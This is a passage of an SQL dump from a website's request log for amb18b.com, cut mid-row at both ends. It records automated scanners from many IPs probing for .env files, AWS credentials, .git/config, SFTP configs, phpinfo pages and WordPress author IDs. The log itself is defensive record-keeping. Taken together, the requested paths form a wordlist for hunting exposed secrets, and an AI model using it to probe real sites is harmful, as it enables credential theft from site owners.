03:31:35','2025-11-03 03:31:35'),(3352,'https://amb18b.com/config/dev.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:35','2025-11-03 03:31:35'),(3353,'https://amb18b.com/config/production.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:35','2025-11-03 03:31:35'),(3354,'https://amb18b.com/launchSettings.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:35','2025-11-03 03:31:35'),(3355,'https://amb18b.com/appsettings.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:36','2025-11-03 03:31:36'),(3356,'https://amb18b.com/secured/phpinfo.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:36','2025-11-03 03:31:36'),(3357,'https://amb18b.com/config/daemon.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:36','2025-11-03 03:31:36'),(3358,'https://amb18b.com/config/config.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:36','2025-11-03 03:31:36'),(3359,'https://amb18b.com/config/module.config.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:36','2025-11-03 03:31:36'),(3360,'https://amb18b.com/config/cli_bootstrap.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:36','2025-11-03 03:31:36'),(3361,'https://amb18b.com/.env.prod','213.209.157.254','Direct Access',1,'2025-11-03 03:31:36','2025-11-03 03:31:36'),(3362,'https://amb18b.com/config/acl.config.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:36','2025-11-03 03:31:36'),(3363,'https://amb18b.com/api/config/tsconfig.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:37','2025-11-03 03:31:37'),(3364,'https://amb18b.com/app/etc/config.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:37','2025-11-03 03:31:37'),(3365,'https://amb18b.com/settings.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:37','2025-11-03 03:31:37'),(3366,'https://amb18b.com/manifest.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:37','2025-11-03 03:31:37'),(3367,'https://amb18b.com/tsconfig.spec.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:37','2025-11-03 03:31:37'),(3368,'https://amb18b.com/config/test.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:37','2025-11-03 03:31:37'),(3369,'https://amb18b.com/meteor.settings.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:37','2025-11-03 03:31:37'),(3370,'https://amb18b.com/bundleconfig.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:37','2025-11-03 03:31:37'),(3371,'https://amb18b.com/application/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:37','2025-11-03 03:31:37'),(3372,'https://amb18b.com/config/settings.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:38','2025-11-03 03:31:38'),(3373,'https://amb18b.com/appsettings.Staging.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:38','2025-11-03 03:31:38'),(3374,'https://amb18b.com/live_env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:38','2025-11-03 03:31:38'),(3375,'https://amb18b.com/hosting.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:38','2025-11-03 03:31:38'),(3376,'https://amb18b.com/apps/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:38','2025-11-03 03:31:38'),(3377,'https://amb18b.com/mailer/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:38','2025-11-03 03:31:38'),(3378,'https://amb18b.com/.env.project','213.209.157.254','Direct Access',1,'2025-11-03 03:31:38','2025-11-03 03:31:38'),(3379,'https://amb18b.com/shared/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:39','2025-11-03 03:31:39'),(3380,'https://amb18b.com/tsconfig.app.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:39','2025-11-03 03:31:39'),(3381,'https://amb18b.com/admin-app/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:39','2025-11-03 03:31:39'),(3382,'https://amb18b.com/infos.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:39','2025-11-03 03:31:39'),(3383,'https://amb18b.com/config/queue.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:39','2025-11-03 03:31:39'),(3384,'https://amb18b.com/api/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:39','2025-11-03 03:31:39'),(3385,'https://amb18b.com/.env.backup','213.209.157.254','Direct Access',1,'2025-11-03 03:31:42','2025-11-03 03:31:42'),(3386,'https://amb18b.com/.env.production','213.209.157.254','Direct Access',1,'2025-11-03 03:31:42','2025-11-03 03:31:42'),(3387,'https://amb18b.com/.env.config','213.209.157.254','Direct Access',1,'2025-11-03 03:31:43','2025-11-03 03:31:43'),(3388,'https://amb18b.com/.env-example','213.209.157.254','Direct Access',1,'2025-11-03 03:31:43','2025-11-03 03:31:43'),(3389,'https://amb18b.com/.env.development.local','213.209.157.254','Direct Access',1,'2025-11-03 03:31:43','2025-11-03 03:31:43'),(3390,'https://amb18b.com/.env.production.local','213.209.157.254','Direct Access',1,'2025-11-03 03:31:43','2025-11-03 03:31:43'),(3391,'https://amb18b.com/config/cache.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:43','2025-11-03 03:31:43'),(3392,'https://amb18b.com/test1.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:43','2025-11-03 03:31:43'),(3393,'https://amb18b.com/.env-sample','213.209.157.254','Direct Access',1,'2025-11-03 03:31:43','2025-11-03 03:31:43'),(3394,'https://amb18b.com/config/env.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:43','2025-11-03 03:31:43'),(3395,'https://amb18b.com/.env.sample','213.209.157.254','Direct Access',1,'2025-11-03 03:31:43','2025-11-03 03:31:43'),(3396,'https://amb18b.com/laravel/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:43','2025-11-03 03:31:43'),(3397,'https://amb18b.com/laravel/core/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:44','2025-11-03 03:31:44'),(3398,'https://amb18b.com/public/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:44','2025-11-03 03:31:44'),(3399,'https://amb18b.com/env.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:44','2025-11-03 03:31:44'),(3400,'https://amb18b.com/.env.prod.local','213.209.157.254','Direct Access',1,'2025-11-03 03:31:44','2025-11-03 03:31:44'),(3401,'https://amb18b.com/.env.docker','213.209.157.254','Direct Access',1,'2025-11-03 03:31:44','2025-11-03 03:31:44'),(3402,'https://amb18b.com/development/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:45','2025-11-03 03:31:45'),(3403,'https://amb18b.com/.env.example','213.209.157.254','Direct Access',1,'2025-11-03 03:31:45','2025-11-03 03:31:45'),(3404,'https://amb18b.com/app/etc/env.local.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:45','2025-11-03 03:31:45'),(3405,'https://amb18b.com/.env.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:45','2025-11-03 03:31:45'),(3406,'https://amb18b.com/.env.docker.dev','213.209.157.254','Direct Access',1,'2025-11-03 03:31:45','2025-11-03 03:31:45'),(3407,'https://amb18b.com/phpinfo.php3','213.209.157.254','Direct Access',1,'2025-11-03 03:31:45','2025-11-03 03:31:45'),(3408,'https://amb18b.com/.env.dev.local','213.209.157.254','Direct Access',1,'2025-11-03 03:31:45','2025-11-03 03:31:45'),(3409,'https://amb18b.com/config/config.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:45','2025-11-03 03:31:45'),(3410,'https://amb18b.com/.env.development.sample','213.209.157.254','Direct Access',1,'2025-11-03 03:31:45','2025-11-03 03:31:45'),(3411,'https://amb18b.com/phpinfos.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:46','2025-11-03 03:31:46'),(3412,'https://amb18b.com/phpinfo.php5','213.209.157.254','Direct Access',1,'2025-11-03 03:31:46','2025-11-03 03:31:46'),(3413,'https://amb18b.com/info.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:46','2025-11-03 03:31:46'),(3414,'https://amb18b.com/phpinfo.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:46','2025-11-03 03:31:46'),(3415,'https://amb18b.com/phpinfo.php4','213.209.157.254','Direct Access',1,'2025-11-03 03:31:46','2025-11-03 03:31:46'),(3416,'https://amb18b.com/.local','213.209.157.254','Direct Access',1,'2025-11-03 03:31:46','2025-11-03 03:31:46'),(3417,'https://amb18b.com/config/aws.yml','213.209.157.254','Direct Access',1,'2025-11-03 03:31:46','2025-11-03 03:31:46'),(3418,'https://amb18b.com/_profiler/phpinfo','213.209.157.254','Direct Access',1,'2025-11-03 03:31:46','2025-11-03 03:31:46'),(3419,'https://amb18b.com/beta/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:47','2025-11-03 03:31:47'),(3420,'https://amb18b.com/.env.local','213.209.157.254','Direct Access',1,'2025-11-03 03:31:47','2025-11-03 03:31:47'),(3421,'https://amb18b.com/admin/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:47','2025-11-03 03:31:47'),(3422,'https://amb18b.com/phpinfo','213.209.157.254','Direct Access',1,'2025-11-03 03:31:47','2025-11-03 03:31:47'),(3423,'https://amb18b.com/dashboard/phpinfo.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:47','2025-11-03 03:31:47'),(3424,'https://amb18b.com/public/client/planinfo','213.209.157.254','Direct Access',1,'2025-11-03 03:31:48','2025-11-03 03:31:48'),(3425,'https://amb18b.com/php-info.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:48','2025-11-03 03:31:48'),(3426,'https://amb18b.com/linusadmin-phpinfo.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:48','2025-11-03 03:31:48'),(3427,'https://amb18b.com/.env.dev','213.209.157.254','Direct Access',1,'2025-11-03 03:31:48','2025-11-03 03:31:48'),(3428,'https://amb18b.com/_profiler/phpinfo.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:48','2025-11-03 03:31:48'),(3429,'https://amb18b.com/.env.dist','213.209.157.254','Direct Access',1,'2025-11-03 03:31:48','2025-11-03 03:31:48'),(3430,'https://amb18b.com/prod/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:49','2025-11-03 03:31:49'),(3431,'https://amb18b.com/config/env.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:49','2025-11-03 03:31:49'),(3432,'https://amb18b.com/.docker/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:49','2025-11-03 03:31:49'),(3433,'https://amb18b.com/.remote','213.209.157.254','Direct Access',1,'2025-11-03 03:31:49','2025-11-03 03:31:49'),(3434,'https://amb18b.com/config/environment.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:50','2025-11-03 03:31:50'),(3435,'https://amb18b.com/.env.travis','213.209.157.254','Direct Access',1,'2025-11-03 03:31:50','2025-11-03 03:31:50'),(3436,'https://amb18b.com/src/config/environment.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:50','2025-11-03 03:31:50'),(3437,'https://amb18b.com/.docker/laravel/app/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:50','2025-11-03 03:31:50'),(3438,'https://amb18b.com/.env.stage','213.209.157.254','Direct Access',1,'2025-11-03 03:31:50','2025-11-03 03:31:50'),(3439,'https://amb18b.com/config.js','213.209.157.254','Direct Access',1,'2025-11-03 03:31:50','2025-11-03 03:31:50'),(3440,'https://amb18b.com/.envrc','213.209.157.254','Direct Access',1,'2025-11-03 03:31:50','2025-11-03 03:31:50'),(3441,'https://amb18b.com/helpers/utility.js','213.209.157.254','Direct Access',1,'2025-11-03 03:31:50','2025-11-03 03:31:50'),(3442,'https://amb18b.com/.env~','213.209.157.254','Direct Access',1,'2025-11-03 03:31:50','2025-11-03 03:31:50'),(3443,'https://amb18b.com/app/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:51','2025-11-03 03:31:51'),(3444,'https://amb18b.com/login?pp=enable&pp=env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:51','2025-11-03 03:31:51'),(3445,'https://amb18b.com/appsettings.QA.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:51','2025-11-03 03:31:51'),(3446,'https://amb18b.com/.env.save','213.209.157.254','Direct Access',1,'2025-11-03 03:31:51','2025-11-03 03:31:51'),(3447,'https://amb18b.com/src/config/config.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:51','2025-11-03 03:31:51'),(3448,'https://amb18b.com/prevlaravel/sftp-config.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:51','2025-11-03 03:31:51'),(3449,'https://amb18b.com/app/etc/env.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:51','2025-11-03 03:31:51'),(3450,'https://amb18b.com/login/index.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:52','2025-11-03 03:31:52'),(3451,'https://amb18b.com/frontend_dev.php/$','213.209.157.254','Direct Access',1,'2025-11-03 03:31:52','2025-11-03 03:31:52'),(3452,'https://amb18b.com/dev/phpinfo.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:52','2025-11-03 03:31:52'),(3453,'https://amb18b.com/test2.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:52','2025-11-03 03:31:52'),(3454,'https://amb18b.com/.ssh/sftp-config.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:52','2025-11-03 03:31:52'),(3455,'https://amb18b.com/crm/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:52','2025-11-03 03:31:52'),(3456,'https://amb18b.com/backend/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:52','2025-11-03 03:31:52'),(3457,'https://amb18b.com/config.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:52','2025-11-03 03:31:52'),(3458,'https://amb18b.com/config/mail.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:53','2025-11-03 03:31:53'),(3459,'https://amb18b.com/kyc/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:53','2025-11-03 03:31:53'),(3460,'https://amb18b.com/web/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:53','2025-11-03 03:31:53'),(3461,'https://amb18b.com/symfony/_profiler/phpinfo','213.209.157.254','Direct Access',1,'2025-11-03 03:31:53','2025-11-03 03:31:53'),(3462,'https://amb18b.com/.production','213.209.157.254','Direct Access',1,'2025-11-03 03:31:53','2025-11-03 03:31:53'),(3463,'https://amb18b.com/config/database.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:53','2025-11-03 03:31:53'),(3464,'https://amb18b.com/.vscode/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:53','2025-11-03 03:31:53'),(3465,'https://amb18b.com/private/env.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:53','2025-11-03 03:31:53'),(3466,'https://amb18b.com/appsettings.Local.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:53','2025-11-03 03:31:53'),(3467,'https://amb18b.com/sftp.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:54','2025-11-03 03:31:54'),(3468,'https://amb18b.com/application/config/constants.php/','213.209.157.254','Direct Access',1,'2025-11-03 03:31:54','2025-11-03 03:31:54'),(3469,'https://amb18b.com/.aws/config','213.209.157.254','Direct Access',1,'2025-11-03 03:31:54','2025-11-03 03:31:54'),(3470,'https://amb18b.com/.gitlab-ci/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:54','2025-11-03 03:31:54'),(3471,'https://amb18b.com/.envs','213.209.157.254','Direct Access',1,'2025-11-03 03:31:54','2025-11-03 03:31:54'),(3472,'https://amb18b.com/php.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:54','2025-11-03 03:31:54'),(3473,'https://amb18b.com/aws.yml','213.209.157.254','Direct Access',1,'2025-11-03 03:31:54','2025-11-03 03:31:54'),(3474,'https://amb18b.com/src/settings.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:54','2025-11-03 03:31:54'),(3475,'https://amb18b.com/install/index.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:55','2025-11-03 03:31:55'),(3476,'https://amb18b.com/private/config.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:55','2025-11-03 03:31:55'),(3477,'https://amb18b.com/.vscode/sftp.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:55','2025-11-03 03:31:55'),(3478,'https://amb18b.com/.aws/credentials','213.209.157.254','Direct Access',1,'2025-11-03 03:31:55','2025-11-03 03:31:55'),(3479,'https://amb18b.com/index.php/phpinfo','213.209.157.254','Direct Access',1,'2025-11-03 03:31:55','2025-11-03 03:31:55'),(3480,'https://amb18b.com/config/app.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:55','2025-11-03 03:31:55'),(3481,'https://amb18b.com/Properties/launchSettings.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:55','2025-11-03 03:31:55'),(3482,'https://amb18b.com/sftp-config.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:55','2025-11-03 03:31:55'),(3483,'https://amb18b.com/.env.bak','213.209.157.254','Direct Access',1,'2025-11-03 03:31:55','2025-11-03 03:31:55'),(3484,'https://amb18b.com/.vscode/settings.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:56','2025-11-03 03:31:56'),(3485,'https://amb18b.com/?author=2','178.128.95.221','Direct Access',1,'2025-11-03 05:34:47','2025-11-03 05:34:47'),(3486,'https://amb18b.com//wp-includes/wlwmanifest.xml','196.251.70.141','Direct Access',1,'2025-11-03 05:52:46','2025-11-03 05:52:46'),(3487,'https://amb18b.com//?author=2','196.251.70.141','Direct Access',1,'2025-11-03 05:52:49','2025-11-03 05:52:49'),(3488,'https://amb18b.com/wordpress','208.88.75.193','Direct Access',4,'2025-11-03 08:00:46','2025-11-03 07:50:07'),(3489,'https://amb18b.com/wp','208.88.75.193','Direct Access',3,'2025-11-03 08:10:35','2025-11-03 08:02:59'),(3490,'https://amb18b.com/old','208.88.75.193','Direct Access',3,'2025-11-03 08:22:30','2025-11-03 08:14:52'),(3491,'https://amb18b.com/oldsite','208.88.75.193','Direct Access',1,'2025-11-03 08:24:51','2025-11-03 08:24:51'),(3492,'https://amb18b.com/new','208.88.75.193','Direct Access',3,'2025-11-03 08:35:23','2025-11-03 08:28:12'),(3493,'https://amb18b.com/wp-old','208.88.75.193','Direct Access',1,'2025-11-03 08:37:52','2025-11-03 08:37:52'),(3494,'https://amb18b.com/2022','208.88.75.193','Direct Access',1,'2025-11-03 08:41:44','2025-11-03 08:41:44'),(3495,'https://amb18b.com/2023','208.88.75.193','Direct Access',1,'2025-11-03 08:45:45','2025-11-03 08:45:45'),(3496,'https://amb18b.com/2024','208.88.75.193','Direct Access',1,'2025-11-03 08:47:49','2025-11-03 08:47:49'),(3497,'https://amb18b.com/2017','208.88.75.193','Direct Access',1,'2025-11-03 08:53:37','2025-11-03 08:53:37'),(3498,'https://amb18b.com/2020','208.88.75.193','Direct Access',1,'2025-11-03 08:55:48','2025-11-03 08:55:48'),(3499,'https://amb18b.com/2019','208.88.75.193','Direct Access',1,'2025-11-03 08:58:46','2025-11-03 08:58:46'),(3500,'https://amb18b.com/2018','208.88.75.193','Direct Access',1,'2025-11-03 09:03:07','2025-11-03 09:03:07'),(3501,'https://amb18b.com/backup','208.88.75.193','Direct Access',3,'2025-11-03 09:54:25','2025-11-03 09:07:30'),(3502,'https://amb18b.com/test','208.88.75.193','Direct Access',3,'2025-11-03 09:17:44','2025-11-03 09:10:42'),(3503,'https://amb18b.com/demo','208.88.75.193','Direct Access',1,'2025-11-03 09:21:10','2025-11-03 09:21:10'),(3504,'https://amb18b.com/bc','208.88.75.193','Direct Access',1,'2025-11-03 09:25:27','2025-11-03 09:25:27'),(3505,'https://amb18b.com/www','208.88.75.193','Direct Access',3,'2025-11-03 09:34:30','2025-11-03 09:27:42'),(3506,'https://amb18b.com/2021','208.88.75.193','Direct Access',1,'2025-11-03 09:38:14','2025-11-03 09:38:14'),(3507,'https://amb18b.com/main','208.88.75.193','Direct Access',1,'2025-11-03 09:40:15','2025-11-03 09:40:15'),(3508,'https://amb18b.com/old-site','208.88.75.193','Direct Access',1,'2025-11-03 09:45:47','2025-11-03 09:45:47'),(3509,'https://amb18b.com/bk','208.88.75.193','Direct Access',1,'2025-11-03 09:47:28','2025-11-03 09:47:28'),(3510,'https://amb18b.com/SHOP','208.88.75.193','Direct Access',3,'2025-11-03 10:02:52','2025-11-03 09:57:14'),(3511,'https://amb18b.com/bak','208.88.75.193','Direct Access',1,'2025-11-03 10:07:32','2025-11-03 10:07:32'),(3512,'https://amb18b.com/sitio','208.88.75.193','Direct Access',1,'2025-11-03 10:09:47','2025-11-03 10:09:47'),(3513,'https://amb18b.com/bac','208.88.75.193','Direct Access',1,'2025-11-03 10:14:46','2025-11-03 10:14:46'),(3514,'https://amb18b.com/sito','208.88.75.193','Direct Access',1,'2025-11-03 10:16:54','2025-11-03 10:16:54'),(3515,'https://amb18b.com/site','208.88.75.193','Direct Access',3,'2025-11-03 10:28:25','2025-11-03 10:21:18'),(3516,'https://amb18b.com/blog','208.88.75.193','Direct Access',3,'2025-11-03 10:36:17','2025-11-03 10:29:19'),(3517,'https://amb18b.com//wp-includes/wlwmanifest.xml','146.70.194.230','Direct Access',1,'2025-11-03 12:20:25','2025-11-03 12:20:25'),(3518,'https://amb18b.com//?author=2','146.70.194.230','Direct Access',1,'2025-11-03 12:20:27','2025-11-03 12:20:27'),(3519,'https://amb18b.com/graphql','64.227.32.66','Direct Access',1,'2025-11-03 13:09:55','2025-11-03 13:09:55'),(3520,'https://amb18b.com/api','64.227.32.66','Direct Access',1,'2025-11-03 13:09:56','2025-11-03 13:09:56'),(3521,'https://amb18b.com/api/graphql','64.227.32.66','Direct Access',1,'2025-11-03 13:09:57','2025-11-03 13:09:57'),(3522,'https://amb18b.com/graphql/api','64.227.32.66','Direct Access',1,'2025-11-03 13:09:59','2025-11-03 13:09:59'),(3523,'https://amb18b.com/api/gql','64.227.32.66','Direct Access',1,'2025-11-03 13:10:00','2025-11-03 13:10:00'),(3524,'https://amb18b.com/swagger-ui.html','64.227.32.66','Direct Access',1,'2025-11-03 13:10:01','2025-11-03 13:10:01'),(3525,'https://amb18b.com/swagger/index.html','64.227.32.66','Direct Access',1,'2025-11-03 13:10:04','2025-11-03 13:10:04'),(3526,'https://amb18b.com/swagger/swagger-ui.html','64.227.32.66','Direct Access',1,'2025-11-03 13:10:05','2025-11-03 13:10:05'),(3527,'https://amb18b.com/webjars/swagger-ui/index.html','64.227.32.66','Direct Access',1,'2025-11-03 13:10:06','2025-11-03 13:10:06'),(3528,'https://amb18b.com/swagger.json','64.227.32.66','Direct Access',1,'2025-11-03 13:10:08','2025-11-03 13:10:08'),(3529,'https://amb18b.com/swagger/v1/swagger.json','64.227.32.66','Direct Access',1,'2025-11-03 13:10:09','2025-11-03 13:10:09'),(3530,'https://amb18b.com/v2/api-docs','64.227.32.66','Direct Access',1,'2025-11-03 13:10:10','2025-11-03 13:10:10'),(3531,'https://amb18b.com/@vite/env','64.227.32.66','Direct Access',1,'2025-11-03 13:10:11','2025-11-03 13:10:11'),(3532,'https://amb18b.com/actuator/env','64.227.32.66','Direct Access',1,'2025-11-03 13:10:12','2025-11-03 13:10:12'),(3533,'https://amb18b.com/server','64.227.32.66','Direct Access',1,'2025-11-03 13:10:14','2025-11-03 13:10:14'),(3534,'https://amb18b.com/.vscode/sftp.json','64.227.32.66','Direct Access',1,'2025-11-03 13:10:15','2025-11-03 13:10:15'),(3535,'https://amb18b.com/about','64.227.32.66','Direct Access',1,'2025-11-03 13:10:16','2025-11-03 13:10:16'),(3536,'https://amb18b.com/debug/default/view?panel=config','64.227.32.66','Direct Access',1,'2025-11-03 13:10:17','2025-11-03 13:10:17'),(3537,'https://amb18b.com/v2/_catalog','64.227.32.66','Direct Access',1,'2025-11-03 13:10:19','2025-11-03 13:10:19'),(3538,'https://amb18b.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application','64.227.32.66','Direct Access',1,'2025-11-03 13:10:20','2025-11-03 13:10:20'),(3539,'https://amb18b.com/server-status','64.227.32.66','Direct Access',1,'2025-11-03 13:10:21','2025-11-03 13:10:21'),(3540,'https://amb18b.com/login.action','64.227.32.66','Direct Access',1,'2025-11-03 13:10:22','2025-11-03 13:10:22'),(3541,'https://amb18b.com/_all_dbs','64.227.32.66','Direct Access',1,'2025-11-03 13:10:24','2025-11-03 13:10:24'),(3542,'https://amb18b.com/.DS_Store','64.227.32.66','Direct Access',1,'2025-11-03 13:10:25','2025-11-03 13:10:25'),(3543,'https://amb18b.com/.env','64.227.32.66','Direct Access',1,'2025-11-03 13:10:26','2025-11-03 13:10:26'),(3544,'https://amb18b.com/s/7383e2934313e27363e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties','64.227.32.66','Direct Access',1,'2025-11-03 13:10:31','2025-11-03 13:10:31'),(3545,'https://amb18b.com/.git/config','64.227.32.66','Direct Access',1,'2025-11-03 13:10:31','2025-11-03 13:10:31'),(3546,'https://amb18b.com/config.json','64.227.32.66','Direct Access',1,'2025-11-03 13:10:33','2025-11-03 13:10:33'),(3547,'https://amb18b.com/telescope/requests','64.227.32.66','Direct Access',1,'2025-11-03 13:10:33','2025-11-03 13:10:33'),(3548,'https://amb18b.com/info.php','64.227.32.66','Direct Access',1,'2025-11-03 13:10:35','2025-11-03 13:10:35'),(3549,'https://amb18b.com//wp-includes/ID3/license.txt','146.70.194.244','Direct Access',1,'2025-11-03 14:11:29','2025-11-03 14:11:29'),(3550,'https://amb18b.com/?author=2','146.70.194.244','Direct Access',1,'2025-11-03 14:11:32','2025-11-03 14:11:32'),(3551,'https://amb18b.com/tiny.php','95.24.72.57','Direct Access',1,'2025-11-03 15:33:40','2025-11-03 15:33:40'),(3552,'https://amb18b.com/tiny.php','136.169.214.114','Direct Access',1,'2025-11-03 15:36:26','2025-11-03 15:36:26'),(3553,'https://amb18b.com//wp-includes/wlwmanifest.xml','146.70.194.230','Direct Access',1,'2025-11-03 16:03:54','2025-11-03 16:03:54'),(3554,'https://amb18b.com//?author=2','146.70.194.230','Direct Access',1,'2025-11-03 16:03:56','2025-11-03 16:03:56'),(3555,'https://amb18b.com/components/com_jbcatalog/libraries/jsupload/server/php/index.php?file=tf2rghf.jpg','196.251.87.191','Direct Access',1,'2025-11-03 17:02:31','2025-11-03 17:02:31'),(3556,'https://amb18b.com/backup/','34.26.172.191','Direct Access',1,'2025-11-03 17:22:37','2025-11-03 17:22:37'),(3557,'https://amb18b.com/wordpress/','34.26.172.191','Direct Access',1,'2025-11-03 17:22:39','2025-11-03 17:22:39'),(3558,'https://amb18b.com/old/','34.26.172.191','Direct Access',1,'2025-11-03 17:22:41','2025-11-03 17:22:41'),(3559,'https://amb18b.com/wp/','34.26.172.191','Direct Access',1,'2025-11-03 17:22:43','2025-11-03 17:22:43'),(3560,'https://amb18b.com/new/','34.26.172.191','Direct Access',1,'2025-11-03 17:22:45','2025-11-03 17:22:45'),(3561,'https://amb18b.com/blog/','34.26.172.191','Direct Access',1,'2025-11-03 17:22:46','2025-11-03 17:22:46'),(3562,'https://amb18b.com//wp-includes/wlwmanifest.xml','196.251.69.43','Direct Access',1,'2025-11-03 17:49:42','2025-11-03 17:49:42'),(3563,'https://amb18b.com//?author=2','196.251.69.43','Direct Access',1,'2025-11-03 17:49:46','2025-11-03 17:49:46'),(3564,'https://amb18b.com//?author=3','196.251.69.43','Direct Access',1,'2025-11-03 17:49:47','2025-11-03 17:49:47'),(3565,'https://amb18b.com/.git/config','104.131.162.83','Direct Access',1,'2025-11-03 18:15:09','2025-11-03 18:15:09'),(3566,'https://amb18b.com/.git/config','45.148.10.152','Direct Access',1,'2025-11-03 20:47:09','2025-11-03 20:47:09'),(3567,'https://amb18b.com/.env','3.68.72.118','Direct Access',1,'2025-11-03 23:14:49','2025-11-03 23:14:49'),(3568,'https://amb18b.com/.vscode/.env','3.68.72.118','Direct Access',1,'2025-11-03 23:14:51','2025-11-03 23:14:51'),(3569,'https://amb18b.com/public/.env','3.68.72.118','Direct Access',1,'2025-11-03 23:14:52','2025-11-03 23:14:52'),(3570,'https://amb18b.com/market/.env.production','3.68.72.118','Direct Access',1,'2025-11-03 23:14:53','2025-11-03 23:14:53'),(3571,'https://amb18b.com/cron/.env.staging','3.68.72.118','Direct Access',1,'2025-11-03 23:14:54','2025-11-03 23:14:54'),(3572,'https://amb18b.com/website/.env','3.68.72.118','Direct Access',1,'2025-11-03 23:14:55','2025-11-03 23:14:55'),(3573,'https://amb18b.com/production/.env.production','3.68.72.118','Direct Access',1,'2025-11-03 23:14:57','2025-11-03 23:14:57'),(3574,'https://amb18b.com/live/.env','3.68.72.118','Direct Access',1,'2025-11-03 23:14:58','2025-11-03 23:14:58'),(3575,'https://amb18b.com/kyc/.env.local','3.68.72.118','Direct Access',1,'2025-11-03 23:14:59','2025-11-03 23:14:59'),(3576,'https://amb18b.com/server/.env.production','3.68.72.118','Direct Access',1,'2025-11-03 23:15:00','2025-11-03 23:15:00'),(3577,'https://amb18b.com/staging/.env','3.68.72.118','Direct Access',1,'2025-11-03 23:15:01','2025-11-03 23:15:01'),(3578,'https://amb18b.com/mailer/.env','3.68.72.118','Direct Access',1,'2025-11-03 23:15:02','2025-11-03 23:15:02'),(3579,'https://amb18b.com/backend/.env','3.68.72.118','Direct Access',1,'2025-11-03 23:15:03','2025-11-03 23:15:03'),(3580,'https://amb18b.com/admin/.env.staging','3.68.72.118','Direct Access',1,'2025-11-03 23:15:04','2025-11-03 23:15:04'),(3581,'https://amb18b.com/app/.env.production','3.68.72.118','Direct Access',1,'2025-11-03 